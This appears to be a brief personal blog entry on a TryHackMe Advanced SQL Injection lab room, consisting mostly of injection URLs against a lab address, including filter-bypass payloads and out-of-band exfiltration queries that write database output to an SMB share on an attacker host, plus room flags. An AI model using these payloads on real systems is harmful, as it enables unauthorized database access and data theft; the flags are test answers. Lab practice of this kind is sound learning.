
Monday, another week has begun and it’s time to crack on with some THM!
This week we continue with the Web Application Pentesting path and start off on the Advanced SQL Injection room.

















Flag – THM{SO_HACKED}


Flag – THM{Table_Dropped}








http://10.10.18.169/encoding/search_books.php?book_name=Intro%20to%20PHP%27%20%7C%7C%201=1%20--+
Intro%20to%20PHP'%20%7C%7C%201=1%20--+





http://10.10.18.169/space/search_users.php?username=?

http://10.10.18.169/space/search_users.php?username=1%27%0A||%0A1=1%0A--%27+









python3.9 smbserver.py -smb2support -comment "My Logs Server" -debug logs /tmp


http://10.10.18.169/oob/search_visitor.php?visitor_name=Tim

http://10.10.18.169/oob/search_visitor.php?visitor_name=1%27;%20SELECT%20@@version%20INTO%20OUTFILE%20%27\\10.10.12.128\logs\out.txt%27;%20--


http://10.10.18.169/oob/search_visitor.php?visitor_name=1%27;%20SELECT%20@@basedir%20INTO%20OUTFILE%20%27\\10.10.12.128\logs\out1.txt%27;%20--









Flag – THM{HELLO}












Until next time & don’t sleepwalk through life!
Jan mayampitaki
